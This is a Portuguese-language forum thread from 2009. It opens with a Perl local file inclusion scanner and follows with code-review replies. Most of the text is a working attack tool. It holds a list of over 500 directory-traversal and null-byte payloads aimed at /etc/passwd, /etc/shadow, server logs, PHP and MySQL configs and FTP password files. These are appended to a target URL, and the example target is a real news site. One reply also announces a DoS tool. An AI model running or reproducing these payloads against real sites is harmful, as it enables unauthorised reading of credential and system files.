[Perl] LFI Scanner.

Joey · 08 de Maio , 2009, 12:08:10 AM

Não é um code profissional mais da pro gasto rs
O scan demora um pouco porque são mais de 500 patchs pra scannear...

#!/usr/bin/perl

use LWP::UserAgent; 
use HTTP::Request::Common; 

$os="$^O";if ($os eq linux){ $sys="clear";} else { $sys="cls"; system("color 0a"); }
system("$sys");

print "   [+] + =================[***]================= + [+]\n";
print "            --- LFI Scanner coded by Joey ---  \n";
print "                     Mais de 500 paths\n";
print "                  Email: sac\@sjoey.com\n";
print "   [+] + =================[***]================= + [+]\n";
sleep(3);
system("$sys");
print "   [+] + =================[***]================= + [+]\n";
print "            --- LFI Scanner coded by Joey ---  \n";
print "              Digite o site a ser scanneado\n";
print "     Exemplo: http://gazetaonline.globo.com/index.php?id=\n";
print "   [+] + =================[***]================= + [+]\n\n";
print "Site: ";
$site=<STDIN>;
chomp($site);
print "Agora digite o nome do arquivo a ser log. Exemplo: lfi.txt\n";
print "Nome do arquivo: ";
$arq=<STDIN>; chomp($arq);
if ($site !~ /http:\/\//) { $site="http://$site"; }
if ($arq !~ /.txt/ ) { $arq="$arq.txt"; }
system("$sys");
print "   [+] + =================[***]================= + [+]\n";
print "            --- LFI Scanner coded by Joey ---  \n";
print "                    O Scan comecou!\n";
print "          O scan pode demorar alguns minutos...\n";
print "   [+] + =================[***]================= + [+]\n\n";

@patch=('/etc/passwd',
'/etc/shadow',
'/etc/group',
'/etc/security/group',
'/etc/security/passwd',
'/etc/security/user',
'/etc/security/environ',
'/etc/security/limits',
'/usr/lib/security/mkuser.default',
'/apache/logs/access.log',
'/apache/logs/error.log',
'/apache/logs/access.log',
'/apache/logs/error.log',
'/apache/logs/access.log',
'/etc/httpd/logs/acces_log',
'/etc/httpd/logs/acces.log',
'/etc/httpd/logs/error_log',
'/etc/httpd/logs/error.log',
'/var/www/logs/access_log',
'/var/www/logs/access.log',
'/usr/local/apache/logs/access_ log',
'/usr/local/apache/logs/access. log',
'/var/log/apache/access_log',
'/var/log/apache2/access_log',
'/var/log/apache/access.log',
'/var/log/apache2/access.log',
'/var/log/access_log',
'/var/log/access.log',
'/var/www/logs/error_log',
'/var/www/logs/error.log',
'/usr/local/apache/logs/error_log',
'/usr/local/apache/logs/error.log',
'/var/log/apache/error_log',
'/var/log/apache2/error_log',
'/var/log/apache/error.log',
'/var/log/apache2/error.log',
'/var/log/error_log',
'/var/log/error.log',
'/var/log/httpd/access_log',
'/var/log/httpd/error_log',
'/var/log/httpd/access_log',
'/var/log/httpd/error_log',
'/apache/logs/error.log',
'/apache/logs/access.log',
'/apache/logs/error.log',
'/apache/logs/access.log',
'/apache/logs/error.log',
'/apache/logs/access.log',
'/apache/logs/error.log',
'/apache/logs/access.log',
'/apache/logs/error.log',
'/apache/logs/access.log',
'/apache2/logs/error.log',
'/apache2/logs/access.log',
'/apache2/logs/error.log',
'/apache2/logs/access.log',
'/apache2/logs/error.log',
'/apache2/logs/access.log',
'/apache2/logs/error.log',
'/apache2/logs/access.log',
'/apache2/logs/error.log',
'/apache2/logs/access.log',
'/logs/error.log',
'/logs/access.log',
'/logs/error.log',
'/logs/access.log',
'/logs/error.log',
'/logs/access.log',
'/logs/error.log',
'/logs/access.log',
'/logs/error.log',
'/logs/access.log',
'/etc/httpd/logs/acces_log',
'/etc/httpd/logs/acces.log',
'/etc/httpd/logs/error_log',
'/etc/httpd/logs/error.log',
'/usr/local/apache/logs/access_log',
'/usr/local/apache/logs/access.log',
'/usr/local/apache/logs/error_log',
'/usr/local/apache/logs/error.log',
'/usr/local/apache2/logs/access_log',
'/usr/local/apache2/logs/access.log',
'/usr/local/apache2/logs/error_log',
'/usr/local/apache2/logs/error.log',
'/var/www/logs/access_log',
'/var/www/logs/access.log',
'/var/www/logs/error_log',
'/var/www/logs/error.log',
'/var/log/httpd/access_log',
'/var/log/httpd/access.log',
'/var/log/httpd/error_log',
'/var/log/httpd/error.log',
'/var/log/apache/access_log',
'/var/log/apache/access.log',
'/var/log/apache/error_log',
'/var/log/apache/error.log',
'/var/log/apache2/access_log',
'/var/log/apache2/access.log',
'/var/log/apache2/error_log',
'/var/log/apache2/error.log',
'/var/log/access_log',
'/var/log/access.log',
'/var/log/error_log',
'/var/log/error.log',
'/opt/lampp/logs/access_log',
'/opt/lampp/logs/error_log',
'/opt/xampp/logs/access_log',
'/opt/xampp/logs/error_log',
'/opt/lampp/logs/access.log',
'/opt/lampp/logs/error.log',
'/opt/xampp/logs/access.log',
'/opt/xampp/logs/error.log',
'/Program Files\Apache Group\Apache\logs\access.log',
'/Program Files\Apache Group\Apache\logs\error.log',
'/apache/logs/error.log',
'/apache/logs/access.log',
'/apache/logs/error.log',
'/apache/logs/access.log',
'/apache/logs/error.log',
'/apache/logs/access.log',
'/apache/logs/error.log',
'/apache/logs/access.log',
'/apache/logs/error.log',
'/apache/logs/access.log',
'/apache/logs/error.log',
'/apache/logs/access.log',
'/logs/error.log',
'/logs/access.log',
'/logs/error.log',
'/logs/access.log',
'/logs/error.log',
'/logs/access.log',
'/logs/error.log',
'/logs/access.log',
'/logs/error.log',
'/logs/access.log',
'/logs/error.log',
'/logs/access.log',
'/etc/httpd/logs/acces_log',
'/etc/httpd/logs/acces.log',
'/etc/httpd/logs/error_log',
'/etc/httpd/logs/error.log',
'/var/www/logs/access_log',
'/var/www/logs/access.log',
'/usr/local/apache/logs/access_log',
'/usr/local/apache/logs/access.log',
'/var/log/apache/access_log',
'/var/log/apache/access.log',
'/var/log/access_log',
'/var/www/logs/error_log',
'/var/www/logs/error.log',
'/usr/local/apache/logs/error_log',
'/usr/local/apache/logs/error.log',
'/var/log/apache/error_log',
'/var/log/apache/error.log',
'/var/log/access_log',
'/var/log/error_log',
'/usr/local/apache/conf/httpd.conf',
'/usr/local/apache2/conf/httpd.conf',
'/etc/httpd/conf/httpd.conf',
'/etc/apache/conf/httpd.conf',
'/usr/local/etc/apache/conf/httpd.conf',
'/etc/apache2/httpd.conf',
'/usr/local/apache/conf/httpd.conf',
'/usr/local/apache2/conf/httpd.conf',
'/usr/local/apache/httpd.conf',
'/usr/local/apache2/httpd.conf',
'/usr/local/httpd/conf/httpd.conf',
'/usr/local/etc/apache/conf/httpd.conf',
'/usr/local/etc/apache2/conf/httpd.conf',
'/usr/local/etc/httpd/conf/httpd.conf',
'/usr/apache2/conf/httpd.conf',
'/usr/apache/conf/httpd.conf',
'/usr/local/apps/apache2/conf/httpd.conf',
'/usr/local/apps/apache/conf/httpd.conf',
'/etc/apache/conf/httpd.conf',
'/etc/apache2/conf/httpd.conf',
'/etc/httpd/conf/httpd.conf',
'/etc/http/conf/httpd.conf',
'/etc/apache2/httpd.conf',
'/etc/httpd/httpd.conf',
'/etc/http/httpd.conf',
'/etc/httpd.conf',
'/opt/apache/conf/httpd.conf',
'/opt/apache2/conf/httpd.conf',
'/var/www/conf/httpd.conf',
'/private/etc/httpd/httpd.conf',
'/private/etc/httpd/httpd.conf.default',
'/Volumes/webBackup/opt/apache2/conf/httpd.conf',
'/Volumes/webBackup/private/etc/httpd/httpd.conf',
'/Volumes/webBackup/private/etc/httpd/httpd.conf.default',
'/Program Files\Apache Group\Apache\conf\httpd.conf',
'/Program Files\Apache Group\Apache2\conf\httpd.conf',
'/Program Files\xampp\apache\conf\httpd.conf',
'/usr/local/php/httpd.conf.php',
'/usr/local/php4/httpd.conf.php',
'/usr/local/php5/httpd.conf.php',
'/usr/local/php/httpd.conf',
'/usr/local/php4/httpd.conf',
'/usr/local/php5/httpd.conf',
'/Volumes/Macintosh_HD1/opt/httpd/conf/httpd.conf',
'/Volumes/Macintosh_HD1/opt/apache/conf/httpd.conf',
'/Volumes/Macintosh_HD1/opt/apache2/conf/httpd.conf',
'/Volumes/Macintosh_HD1/usr/local/php/httpd.conf.php',
'/Volumes/Macintosh_HD1/usr/local/php4/httpd.conf.php',
'/Volumes/Macintosh_HD1/usr/local/php5/httpd.conf.php',
'/usr/local/etc/apache/vhosts.conf',
'/etc/php.ini',
'/bin/php.ini',
'/etc/httpd/php.ini',
'/usr/lib/php.ini',
'/usr/lib/php/php.ini',
'/usr/local/etc/php.ini',
'/usr/local/lib/php.ini',
'/usr/local/php/lib/php.ini',
'/usr/local/php4/lib/php.ini',
'/usr/local/php5/lib/php.ini',
'/usr/local/apache/conf/php.ini',
'/etc/php4.4/fcgi/php.ini',
'/etc/php4/apache/php.ini',
'/etc/php4/apache2/php.ini',
'/etc/php5/apache/php.ini',
'/etc/php5/apache2/php.ini',
'/etc/php/php.ini',
'/etc/php/php4/php.ini',
'/etc/php/apache/php.ini',
'/etc/php/apache2/php.ini',
'/web/conf/php.ini',
'/usr/local/Zend/etc/php.ini',
'/opt/xampp/etc/php.ini',
'/var/local/www/conf/php.ini',
'/etc/php/cgi/php.ini',
'/etc/php4/cgi/php.ini',
'/etc/php5/cgi/php.ini',
'/php5\php.ini',
'/php4\php.ini',
'/php\php.ini',
'/PHP\php.ini',
'/WINDOWS\php.ini',
'/WINNT\php.ini',
'/apache\php\php.ini',
'/xampp\apache\bin\php.ini',
'/NetServer\bin\stable\apache\php.ini',
'/home2\bin\stable\apache\php.ini',
'/home\bin\stable\apache\php.ini',
'/Volumes/Macintosh_HD1/usr/local/php/lib/php.ini',
'/usr/local/cpanel/logs',
'/usr/local/cpanel/logs/stats_log',
'/usr/local/cpanel/logs/access_log',
'/usr/local/cpanel/logs/error_log',
'/usr/local/cpanel/logs/license_log',
'/usr/local/cpanel/logs/login_log',
'/usr/local/cpanel/logs/stats_log',
'/var/cpanel/cpanel.config',
'/var/log/mysql/mysql-bin.log',
'/var/log/mysql.log',
'/var/log/mysqlderror.log',
'/var/log/mysql/mysql.log',
'/var/log/mysql/mysql-slow.log',
'/var/mysql.log',
'/var/lib/mysql/my.cnf',
'/etc/mysql/my.cnf',
'/etc/my.cnf',
'/etc/logrotate.d/proftpd',
'/www/logs/proftpd.system.log',
'/var/log/proftpd',
'/etc/proftp.conf',
'/etc/protpd/proftpd.conf',
'/etc/vhcs2/proftpd/proftpd.conf',
'/etc/proftpd/modules.conf',
'/var/log/vsftpd.log',
'/etc/logrotate.d/vsftpd.log',
'/etc/vsftpd/vsftpd.conf',
'/etc/vsftpd.conf',
'/var/log/xferlog',
'/var/adm/log/xferlog',
'/etc/wu-ftpd/ftpaccess',
'/etc/wu-ftpd/ftphosts',
'/etc/wu-ftpd/ftpusers',
'/usr/sbin/pure-config.pl',
'/usr/etc/pure-ftpd.conf',
'/etc/pure-ftpd/pure-ftpd.conf',
'/usr/local/etc/pure-ftpd.conf',
'/usr/local/etc/pureftpd.pdb',
'/usr/local/pureftpd/etc/pureftpd.pdb',
'/usr/local/pureftpd/sbin/pure-config.pl',
'/usr/local/pureftpd/etc/pure-ftpd.conf',
'-/etc/pure-ftpd.conf',
'/etc/pure-ftpd/pure-ftpd.pdb',
'/etc/pureftpd.pdb',
'/etc/pureftpd.passwd',
'/etc/pure-ftpd/pureftpd.pdb',
'/usr/ports/ftp/pure-ftpd/',
'/usr/ports/net/pure-ftpd/',
'/usr/pkgsrc/net/pureftpd/',
'/usr/ports/contrib/pure-ftpd/',
'/var/log/pure-ftpd/pure-ftpd.log',
'/logs/pure-ftpd.log',
'/var/log/pureftpd.log',
'/var/log/ftp-proxy/ftp-proxy.log',
'/var/log/ftp-proxy',
'/var/log/ftplog',
'/etc/logrotate.d/ftp',
'/etc/ftphosts',
'/var/log/exim_mainlog',
'/var/log/exim/mainlog',
'/var/log/maillog',
'/var/log/exim_paniclog',
'/var/log/exim/paniclog',
'/var/log/exim/rejectlog',
'/var/log/exim_rejectlog',
'../../../../../../../../../../../../../../../etc/httpd/logs/acces_log%00',
'../../../../../../../../../../../../../../../etc/httpd/logs/acces.log%00',
'../../../../../../../../../../../../../../../etc/httpd/logs/error_log%00',
'../../../../../../../../../../../../../../../etc/httpd/logs/error.log%00',
'../../../../../../../../../../../../../../../usr/local/apache/logs/access_log%00',
'../../../../../../../../../../../../../../../usr/local/apache/logs/access.log%00',
'../../../../../../../../../../../../../../../usr/local/apache/logs/error_log%00',
'../../../../../../../../../../../../../../../usr/local/apache/logs/error.log%00',
'../../../../../../../../../../../../../../../usr/lib/security/mkuser.default%00',
'../../../../../../../../../../../../../../../usr/local/apache2/logs/access_log%00',
'../../../../../../../../../../../../../../../usr/local/apache2/logs/access.log%00',
'../../../../../../../../../../../../../../../usr/local/apache2/logs/error_log%00',
'../../../../../../../../../../../../../../../usr/local/apache2/logs/error.log%00',
'../../../../../../../../../../../../../../../apache/logs/access.log%00',
'../../../../../../../../../../../../../../../apache/logs/error.log%00',
'../../../../../../../../../../../../../../../apache2/logs/error.log%00',
'../../../../../../../../../../../../../../../apache2/logs/access.log%00',
'../../../../../../../../../../../../../../../var/www/logs/access_log%00',
'../../../../../../../../../../../../../../../var/www/logs/access.log%00',
'../../../../../../../../../../../../../../../var/log/apache/access_log%00',
'../../../../../../../../../../../../../../../var/log/apache2/access_log%00',
'../../../../../../../../../../../../../../../var/log/apache/access.log%00',
'../../../../../../../../../../../../../../../var/log/apache2/access.log%00',
'../../../../../../../../../../../../../../../var/www/logs/error_log%00',
'../../../../../../../../../../../../../../../var/www/logs/error.log%00',
'../../../../../../../../../../../../../../../var/log/access_log%00',
'../../../../../../../../../../../../../../../var/log/access.log%00',
'../../../../../../../../../../../../../../../var/log/apache/error_log%00',
'../../../../../../../../../../../../../../../var/log/apache2/error_log%00',
'../../../../../../../../../../../../../../../var/log/apache/error.log%00',
'../../../../../../../../../../../../../../../var/log/apache2/error.log%00',
'../../../../../../../../../../../../../../../var/log/error_log%00',
'../../../../../../../../../../../../../../../var/log/error.log%00',
'../../../../../../../../../../../../../../../var/log/httpd/access_log%00',
'../../../../../../../../../../../../../../../var/log/httpd/error_log%00',
'../../../../../../../../../../../../../../../var/log/httpd/access.log%00',
'../../../../../../../../../../../../../../../var/log/httpd/error.log%00',
'../../../../../../../../../../../../../../../opt/lampp/logs/access_log%00',
'../../../../../../../../../../../../../../../opt/lampp/logs/error_log%00',
'../../../../../../../../../../../../../../../opt/xampp/logs/access_log%00',
'../../../../../../../../../../../../../../../opt/xampp/logs/error_log%00',
'../../../../../../../../../../../../../../../opt/lampp/logs/access.log%00',
'../../../../../../../../../../../../../../../opt/lampp/logs/error.log%00',
'../../../../../../../../../../../../../../../opt/xampp/logs/access.log%00',
'../../../../../../../../../../../../../../../opt/xampp/logs/error.log%00',
'../../../../../../../../../../../../../../../etc/httpd/logs/acces_log',
'../../../../../../../../../../../../../../../etc/httpd/logs/acces.log',
'../../../../../../../../../../../../../../../etc/httpd/logs/error_log',
'../../../../../../../../../../../../../../../etc/httpd/logs/error.log',
'../../../../../../../../../../../../../../../usr/local/apache/logs/access_log',
'../../../../../../../../../../../../../../../usr/local/apache/logs/access.log',
'../../../../../../../../../../../../../../../usr/local/apache/logs/error_log',
'../../../../../../../../../../../../../../../usr/local/apache/logs/error.log',
'../../../../../../../../../../../../../../../usr/lib/security/mkuser.default',
'../../../../../../../../../../../../../../../usr/local/apache2/logs/access_log',
'../../../../../../../../../../../../../../../usr/local/apache2/logs/access.log',
'../../../../../../../../../../../../../../../usr/local/apache2/logs/error_log',
'../../../../../../../../../../../../../../../usr/local/apache2/logs/error.log',
'../../../../../../../../../../../../../../../apache/logs/access.log',
'../../../../../../../../../../../../../../../apache/logs/error.log',
'../../../../../../../../../../../../../../../apache2/logs/error.log',
'../../../../../../../../../../../../../../../apache2/logs/access.log',
'../../../../../../../../../../../../../../../var/www/logs/access_log',
'../../../../../../../../../../../../../../../var/www/logs/access.log',
'../../../../../../../../../../../../../../../var/log/apache/access_log',
'../../../../../../../../../../../../../../../var/log/apache2/access_log',
'../../../../../../../../../../../../../../../var/log/apache/access.log',
'../../../../../../../../../../../../../../../var/log/apache2/access.log',
'../../../../../../../../../../../../../../../var/www/logs/error_log',
'../../../../../../../../../../../../../../../var/www/logs/error.log',
'../../../../../../../../../../../../../../../var/log/access_log',
'../../../../../../../../../../../../../../../var/log/access.log',
'../../../../../../../../../../../../../../../var/log/apache/error_log',
'../../../../../../../../../../../../../../../var/log/apache2/error_log',
'../../../../../../../../../../../../../../../var/log/apache/error.log',
'../../../../../../../../../../../../../../../var/log/apache2/error.log',
'../../../../../../../../../../../../../../../var/log/error_log',
'../../../../../../../../../../../../../../../var/log/error.log',
'../../../../../../../../../../../../../../../var/log/httpd/access_log',
'../../../../../../../../../../../../../../../var/log/httpd/error_log',
'../../../../../../../../../../../../../../../var/log/httpd/access.log',
'../../../../../../../../../../../../../../../var/log/httpd/error.log',
'../../../../../../../../../../../../../../../opt/lampp/logs/access_log',
'../../../../../../../../../../../../../../../opt/lampp/logs/error_log',
'../../../../../../../../../../../../../../../opt/xampp/logs/access_log',
'../../../../../../../../../../../../../../../opt/xampp/logs/error_log',
'../../../../../../../../../../../../../../../opt/lampp/logs/access.log',
'../../../../../../../../../../../../../../../opt/lampp/logs/error.log',
'../../../../../../../../../../../../../../../opt/xampp/logs/access.log',
'../../../../../../../../../../../../../../../opt/xampp/logs/error.log',
'../etc/passwd',
'../../etc/passwd',
'../../../etc/passwd',
'../../../../etc/passwd',
'../../../../../etc/passwd',
'../../../../../../etc/passwd',
'../../../../../../../etc/passwd',
'../../../../../../../../etc/passwd',
'../../../../../../../../../etc/passwd',
'../../../../../../../../../../etc/passwd',
'../../../../../../../../../../../etc/passwd',
'../../../../../../../../../../../../etc/passwd',
'../../../../../../../../../../../../../etc/passwd',
'../../../../../../../../../../../../../../etc/passwd',
'../../../../../../../../../../../../../../../..etc/passwd',
'../etc/shadow',
'../../etc/shadow',
'../../../etc/shadow',
'../../../../etc/shadow',
'../../../../../etc/shadow',
'../../../../../../etc/shadow',
'../../../../../../../etc/shadow',
'../../../../../../../../etc/shadow',
'../../../../../../../../../etc/shadow',
'../../../../../../../../../../etc/shadow',
'../../../../../../../../../../../etc/shadow',
'../../../../../../../../../../../../etc/shadow',
'../../../../../../../../../../../../../etc/shadow',
'../../../../../../../../../../../../../../etc/shadow',
'../etc/group',
'../../etc/group',
'../../../etc/group',
'../../../../etc/group',
'../../../../../etc/group',
'../../../../../../etc/group',
'../../../../../../../etc/group',
'../../../../../../../../etc/group',
'../../../../../../../../../etc/group',
'../../../../../../../../../../etc/group',
'../../../../../../../../../../../etc/group',
'../../../../../../../../../../../../etc/group',
'../../../../../../../../../../../../../etc/group',
'../../../../../../../../../../../../../../etc/group',
'../etc/security/group',
'../../etc/security/group',
'../../../etc/security/group',
'../../../../etc/security/group',
'../../../../../etc/security/group',
'../../../../../../etc/security/group',
'../../../../../../../etc/security/group',
'../../../../../../../../etc/security/group',
'../../../../../../../../../etc/security/group',
'../../../../../../../../../../etc/security/group',
'../../../../../../../../../../../etc/security/group',
'../etc/security/passwd',
'../../etc/security/passwd',
'../../../etc/security/passwd',
'../../../../etc/security/passwd',
'../../../../../etc/security/passwd',
'../../../../../../etc/security/passwd',
'../../../../../../../etc/security/passwd',
'../../../../../../../../etc/security/passwd',
'../../../../../../../../../etc/security/passwd',
'../../../../../../../../../../etc/security/passwd',
'../../../../../../../../../../../etc/security/passwd',
'../../../../../../../../../../../../etc/security/passwd',
'../../../../../../../../../../../../../etc/security/passwd',
'../../../../../../../../../../../../../../etc/security/passwd',
'../etc/security/user',
'../../etc/security/user',
'../../../etc/security/user',
'../../../../etc/security/user',
'../../../../../etc/security/user',
'../../../../../../etc/security/user',
'../../../../../../../etc/security/user',
'../../../../../../../../etc/security/user',
'../../../../../../../../../etc/security/user',
'../../../../../../../../../../etc/security/user',
'../../../../../../../../../../../etc/security/user',
'../../../../../../../../../../../../etc/security/user',
'../../../../../../../../../../../../../etc/security/user',
'/etc/passwd%00',
'../etc/passwd%00',
'../../etc/passwd%00',
'../../../etc/passwd%00',
'../../../../etc/passwd%00',
'../../../../../etc/passwd%00',
'../../../../../../etc/passwd%00',
'../../../../../../../etc/passwd%00',
'../../../../../../../../etc/passwd%00',
'../../../../../../../../../etc/passwd%00',
'../../../../../../../../../../etc/passwd%00',
'../../../../../../../../../../../etc/passwd%00',
'../../../../../../../../../../../../etc/passwd%00',
'../../../../../../../../../../../../../etc/passwd%00',
'/etc/passwd',
'../etc/passwd',
'../../etc/passwd',
'../../../etc/passwd',
'../../../../etc/passwd',
'../../../../../etc/passwd',
'../../../../../../etc/passwd',
'../../../../../../../etc/passwd',
'../../../../../../../../etc/passwd',
'../../../../../../../../../etc/passwd',
'../../../../../../../../../../etc/passwd',
'../../../../../../../../../../../etc/passwd',
'../../../../../../../../../../../../etc/passwd',
'../../../../../../../../../../../../../etc/passwd');

foreach $patch(@patch) {
$url="$site$patch";
$lwp= LWP::UserAgent->new();
$lwp -> agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; en; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4");
$connect = $lwp -> get($url);

if ($connect->content =~ /root/) { 
$vuln="sim";
open (arq, ">>$arq");
print arq "$url\n";
close(arq);
} else { $vuln="nao"; }
}

if ($vuln == "sim") { 
system("$sys");
print "   [+] + =================[***]================= + [+]\n";
print "            --- LFI Scanner coded by Joey ---  \n";
print "               O Scan foi finalizado...\n";
print "               O log foi salvo em $arq :)\n";
print "   [+] + =================[***]================= + [+]\n";
print "                 [1] - Sair   [2] -  Abrir\n";
print "Digite a opcao: ";
$op=<STDIN>; chomp($op);

if ($op==1) {exit;}
elsif ($op==2) {&open}



sub open {
if (-e "$arq") {
system("start $arq");
} else { print "\nNao foi encontrado nenhuma vulnerabilidade no site"; }
}
}

Mental_Way · 12 de Maio , 2009, 05:36:37 AM

Joey começando em perl.. ;)

Muito bom.. ta ficando legal os scripts, continue assim...

Quem sabe posto algum meu nesses tempos...

Sem mais..

guidjos · 02 de Agosto , 2009, 01:32:40 PM

Legal, parabéns.

Vc se importa se eu melhorar o seu código? Eu posto aqui. Aí você vai ver uns jeitos mais fáceis de fazer umas coisinhas :)

Tudo bem?

Joey · 02 de Agosto , 2009, 04:41:56 PM

Citação de: guidjos online 02 de Agosto , 2009, 01:32:40 PM
Legal, parabéns.

Vc se importa se eu melhorar o seu código? Eu posto aqui. Aí você vai ver uns jeitos mais fáceis de fazer umas coisinhas :)

Tudo bem?

Claro que sim, é sempre bom aprender coisas novas :]

guidjos · 03 de Agosto , 2009, 12:25:48 AM

Ok, reformei o código :)

Novo código: http://guidjos.justfree.com/lfiscan.txt
Lista de vulnerabilidades (leia abaixo): http://guidjos.justfree.com/lista.txt

Explicações:

1. Quando você precisar inserir vários elementos em 1 array (vetor), como, no caso do seu scanner, os

paths pra testes na array @patch, é mais fácil fazer

Código Selecionar


 @patch = qw(elemento1 elemento2 elemento3 elemento4);

ao invés de "@patch = ('elemento1', 'elemento2', 'elemento3', 'elemento4'); ". Outra coisa. O seu

programa pode ficar desatualizado, já que você preencheu as possibilidades de teste dentro do código.

Eu mudei isso, acho que é importante o usuário poder adicionar ou remover testes à vontade. Então no

código reformado, o usuário fornece uma lista de vulnerabilidades a serem testadas. O programa lê a

lista e a armazena na variável @patch, do mesmo jeito que antes, mas agora de qualquer arquivo ao invés

da lista específica que um dia vai ser muito velha. Não é difícil de fazer isso, você vai entender

assim que olhar como eu fiz.

2. Cuidado com as declarações de sub-rotinas. Você declarou a sub-rotina "open" dentro de um if-

statement. O código funciona, mas, digamos, isso não é "saudável". Se você for aprender alguma outra

linguagem que não seja de scripting, quando for escrever funções, terá que escrevê-las fora de

quaisquer laços e condicionais. Não se pode declarar funções dentro de funções. Eu corrigi isso pra

você. Declarei a open() perto do header, por questão de organização. Uma dica: declare todas as sub-

rotinas em um lugar específico do código (procure fazê-lo antes de qualquer chamada para qualquer uma

delas. Isso funciona em poucas linguagens).

3. Lendo variáveis

Eu costumo fazer o usuário passar todos os argumentos na execução do programa (programa.exe arg1 arg2

arg3 etc), ao invés de ler todos eles em run-time. Mas não se preocupa com isso agora. Deixei do jeito

que está, afinal o programa é seu.

Mas tá aí no código uma dica interessante. Pra ler variáveis do teclado:

Código Selecionar


 chop ($var = <STDIN>);

Mais fácil, em? :)

4. Formatação e identação

Organizar o seu código é muito importante. Eu identei o código todo e segui 1 só padrão de formatação.

Procure não fazer coisas como $var = valor e depois fazer $var=valor. Siga um padrão uniforme no código

todo. Organize seu código de forma a torná-lo mais legível. Crie espaçamentos lógicos que identifiquem

cada bloco do código, e onde ele parecer confuso e emaranhado, dê mais espaços. É mais fácil corrigir

erros assim.

5. Comparações com strings

Utilize

Código Selecionar


 if ($string eq "palavra palavra2");

ao invés de if ($string == "palavra"). ==, !=, >, < são operadores numéricos. Pra strings, os

equivalentes são:

Código Selecionar


 == eq
 != ne
 < lt
 > gt
 <= le
 >= ge

6. Caso de falha

Se o programa não encontrar vulnerabilidades, ele simplesmente é interrompido. Sempre preveja todas as

possibilidades e saídas do seu programa, e mantenha o usuário informado sobre o que acontece. Eu

adicionei uma mensagem de erro caso nenhum path funcione.

Isso aí, espero que ajude. Qualquer coisa, manda uma PM.

guidjoS

Joey · 03 de Agosto , 2009, 02:05:32 AM

Muito legal as dicas guidjos, gostei muito, e vou utilizar bastante elas. Não sabia da dica número 5, quer dizer... sabia apenas que existia o "eq" e o "ne", e não sabia que existia uma diferença para se utilizar elas. O "chop($var = <STDIN>);" eu já estou utilizando ele a algum tempo em meus programas ^^ Os arrays foi por questão de preguiça mesmo, eu pesquisei alguns patchs na internet, e eles já estava com a aspa entre eles, dai ficou mais fácil pra por no array hehe. Achei realmente melhor por pra pegar os patchs de um arquivo, quando era completo ele ficava até demorado, sendo que as vezes nem precisava de todos aqueles patchs, tinha pensado em fazer isso, mais acabei esquecendo e nem fiz nada...

Muito obrigado pelas dicas kra :D

Mateus · 03 de Agosto , 2009, 02:23:07 AM

O post me inspirou, terminei de abrir o projeto no netbeans para fazer uma ferramentinha de DoS bem simples aqui =)
Daqui a pouco posto o code :-*

Dkid · 05 de Novembro , 2009, 09:37:28 PM

Joey parabéns pelo seu código.

Troque o <STDIN> por <> que é mais seguro.

E sempre que o utilizador for inserir dados na sua aplicação tente limitar o input ao que realmente deseja.

Código (perl) Selecionar

$var =~ /(\d*)/; # neste caso limitamos a entrada de decimais(números)

Talvez queira dar uma vista de olhos pelo Perl Critic : http://perlcritic.com/

Dkid